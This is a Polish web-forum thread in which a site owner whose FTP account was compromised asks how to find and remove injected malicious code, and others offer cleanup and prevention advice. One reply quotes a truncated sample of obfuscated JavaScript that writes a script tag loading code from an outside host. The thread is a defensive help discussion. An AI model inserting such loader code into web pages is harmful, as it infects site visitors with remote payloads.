Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Strona jako dokonująca ataków! + Prośba o Pomoc., HELP :(
kamykthm
post 14.06.2010, 16:15:00
Post #1





Grupa: Zarejestrowani
Postów: 45
Pomógł: 0
Dołączył: 12.08.2009

Ostrzeżenie: (0%)
-----


Witam, dostał mi się jakiś robal na ftp'a i dostaje po oczach taki komunikat:

Strona zgłoszona jako dokonująca ataków!

Strona wwww.artrent.in została zgłoszona jako strona stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa.


Wywołuje w/w strone z chwilą gdy na domenie nie ma głównego pliku index.* lub katalogu (każdy wie o co chodzi)

Przyznam szczerze że w pewnym okresie czasu dużo osób miało dostęp do ftp'a, ale nie do całego tylko do określonych katalogów, z tym że tam nic nie znalazłem. Szukałem również w innych plikach złośliwego kodu, ale bez skutku. Stąd moje pytanie czy ktoś ma jakiś pomysł aby to g...o usunąć. Mam na ftp'ie ponad 15GB danych, php + html + js etc. Przeskanowanie tego wszystkiego plik po pliku (a tak doradzili mi w home, bo mam tak hosting + podeślą logi i kazali zaktualizować cmy) zajmie mi chyba z rok ;/

I moje drugie pytanie, czy istnieje narzędzie/program aby przeskanował określone pliki php/html i wyszukał określoną skłądnie/kod ?

Proszę o HELP.
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi (1 - 6)
Fifi209
post 14.06.2010, 17:16:29
Post #2





Grupa: Zarejestrowani
Postów: 4 655
Pomógł: 556
Dołączył: 17.03.2009
Skąd: Katowice

Ostrzeżenie: (0%)
-----


Cytat(kamykthm @ 14.06.2010, 17:15:00 ) *
I moje drugie pytanie, czy istnieje narzędzie/program aby przeskanował określone pliki php/html i wyszukał określoną skłądnie/kod ?

Proszę o HELP.

Możesz sam napisać opierając się na wyrażeniach regularnych. ;]


--------------------
Zainteresowania: C#, PHP, JS, SQL, AJAX, XML, C dla AVR
Chętnie pomogę, lecz zanim napiszesz: Wujek Google , Manual PHP
Go to the top of the page
+Quote Post
Wiktor P.
post 14.06.2010, 17:24:03
Post #3





Grupa: Zarejestrowani
Postów: 80
Pomógł: 9
Dołączył: 14.09.2009

Ostrzeżenie: (0%)
-----


To jest bardzo częsty problem.
Właściwie to masz gratis takie problemy jak pracujesz na windows.
W 99% podobnych przypadków dane do konta FTP zostały pobrane przez jakiś wstrętny program
z klienta FTP.
Bardzo dziurawy był kiedyś TotalCommander i zaleca się jego aktualizację do ostatniej najnowszej wersji,
bo twórcom tego programu przez 10 lat nie chciało się załatać dziury.
Dziurawa też jest FileZilla i masa innych podobnych darmówek.

Podejrzewam, że masz doklejony kod na końcu plików index.php, albo w plikach JavaScript.
Jedyne wyjście to skasować wszystko z ftp i wgrać spowrotem (kopia z np. przed kilku dni, kiedy problemu nie było, jeśli prowadzisz archiwizację) lub posprawdzać po kolei wszystkie pliki.
Kod jest doklejany prawie zawsze na samym dole wspomnianych przeze mnie plików.

Po wykonaniu tych czynności piszesz do wujka Google, że prosisz o ponowne sprawdzenie strony, gdyż ktoś wykradł dane do ftp,
podpiął coś itp.

Ponadto:
1. Skanujesz kompa antywirem.
2. Zmieniasz regularnie hasła do ftp.
3. Unikasz zapisywania haseł w pamięci klienta FTP.
4. Usuwasz windowsa, wgrywasz pingwina i problem nigdy nie wróci.

Nie znam żadnych programów do skanu w takim przypadku, ale jest pewien sposób.
Jest pewien program, nazywa się HTML Search And Replace.
Można doklejony kod zlikwidować tym programem hurtowo na wszystkich plikach o ile
w każdym pliku doklejono to samo i jeśli znajdziesz ten kod, żeby go podać programowi HTML Search And Replace.
Jak wspomniałem najczęściej jest on doklejany w plikach index.php lub javascript na samym dole.

Ten post edytował Wiktor P. 14.06.2010, 17:34:00
Go to the top of the page
+Quote Post
kamykthm
post 14.06.2010, 17:41:07
Post #4





Grupa: Zarejestrowani
Postów: 45
Pomógł: 0
Dołączył: 12.08.2009

Ostrzeżenie: (0%)
-----


Co do haseł to już pozmieniałem wszystkie, co do microshita niestety ale musze na nim pozostac (jetem grafikiem) ewentualnie mac ale na maca nie mam $. Kopia nic nie daje bo mam najstarsza z przed 3 dni. Co do TC i FZ to teraz juz nie bede zapisywał haseł. Możecie podać przykładowy dopisywany kod ?

P.S: dzięki za szybką odpowiedź !
Go to the top of the page
+Quote Post
Wiktor P.
post 14.06.2010, 17:52:52
Post #5





Grupa: Zarejestrowani
Postów: 80
Pomógł: 9
Dołączył: 14.09.2009

Ostrzeżenie: (0%)
-----


Cytat(kamykthm @ 14.06.2010, 18:41:07 ) *
Możecie podać przykładowy dopisywany kod ?

  1. try
  2. {window.onload=function()
  3. {
  4. document.write('<div id=megaid>opera-com.mercadolibre.co</div>');Z2actjidmypp = document.getElementById('megaid').innerHTML + 'm@!.(m#)&x&@.!)&v&&k$&^)o)n^@!t!&
  5.  
  6. (...)
  7.  
  8. m#@^/!)'.replace(/#|\(|\$|\)|\^|\!|@|
  9. &/ig, '') ;document.write('<scr'+'ipt src=http://'+Z2actjidmypp.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');
  10. }
  11. } catch(Lozwklx ) {}
  12.  
  13. <!--2587ada5e557ba7c3bd1e13bcc3aa4c8-->


A jeśli chodzi o zgłoszenie prośby do Google o ponowne sprawdzenie strony, to linka nie podam gdzie to się robi, bo nie pamiętam.
Ale w moim przypadku czekałem na interwencję około 48h więc bardzo krótko.

W kwestii Linuksa, jako grafik możesz mieć drugi system i na nim używać klienta ftp.
Polecam Ubuntu Studio. To jest dystrybucja właśnie dla grafików.

Ten post edytował Wiktor P. 14.06.2010, 17:55:37
Go to the top of the page
+Quote Post
kamykthm
post 14.06.2010, 18:10:11
Post #6





Grupa: Zarejestrowani
Postów: 45
Pomógł: 0
Dołączył: 12.08.2009

Ostrzeżenie: (0%)
-----


Cytat(fifi209 @ 14.06.2010, 18:16:29 ) *
Możesz sam napisać opierając się na wyrażeniach regularnych. ;]


Nie jestem programistą, jeśli masz jakiś gotowy skrypt to na prawdę bym był wdzięczny jeśli byś podesłał.

Dzięki za przykład.

Cytat(Wiktor P. @ 14.06.2010, 18:52:52 ) *
A jeśli chodzi o zgłoszenie prośby do Google o ponowne sprawdzenie strony, to linka nie podam gdzie to się robi, bo nie pamiętam.
Ale w moim przypadku czekałem na interwencję około 48h więc bardzo krótko.


To mi chwilowo nie przeszkadza bo na tej domenie akurat nic nie ma i chyba nigdy nie bedzie. Co nie zmienia faktu ze zgłosze to do Pana G.

Cytat(Wiktor P. @ 14.06.2010, 18:52:52 ) *
W kwestii Linuksa, jako grafik możesz mieć drugi system i na nim używać klienta ftp.
Polecam Ubuntu Studio. To jest dystrybucja właśnie dla grafików.


hmmm odpalać pingwina tylko pod FTP ? mało optymalne rozwiązanie. Zastowie się mocno na 'Jabłuszkiem' chodź ciężko będzie bo już próbowałem pod moją konfigurację.

Ten post edytował kamykthm 14.06.2010, 18:11:33
Go to the top of the page
+Quote Post
konfeusz
post 16.06.2010, 08:36:07
Post #7





Grupa: Zarejestrowani
Postów: 31
Pomógł: 0
Dołączył: 26.09.2009

Ostrzeżenie: (0%)
-----


... sie wtrace... tak jak napisal Wiktor, w 99% przypadkach jest doklejony na samym koncu kod do pliku index.php lub index.html (raz mi sie zdazylo, ze musialem odpluskwic plik z danymi do polaczenia z mysql'em i byl zakodowany w md5 wiec sie nameczylem) jednak zawsze (w moim przypadku) nalezalo wyszukac na koncu plikow znacznik <script> w przypadku plikow php znacznik byl wypisywany przez deklaracje echo '';. Wykasowanie tego zawsze czyscilo plik z syfu.

Co do Total Commandera i innych klientow, jesli ktos musi pracowac na windzie (tak jak ja, chociaz pracuje tez na pinglu, ale programuje w AS wiec niejako musze odpalac okienka) nie ma wiekszej rady, jednak bez wzglednie nie nalezy zapamietywac w tych klientach hasel.

Jesli chodzi o link do ponownego sprawdzenia witryny w googlach, odsylam na Forum dla Webdeweloperow na google
http://www.google.com/support/forum/p/Webmasters?hl=pl
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 19.07.2025 - 23:21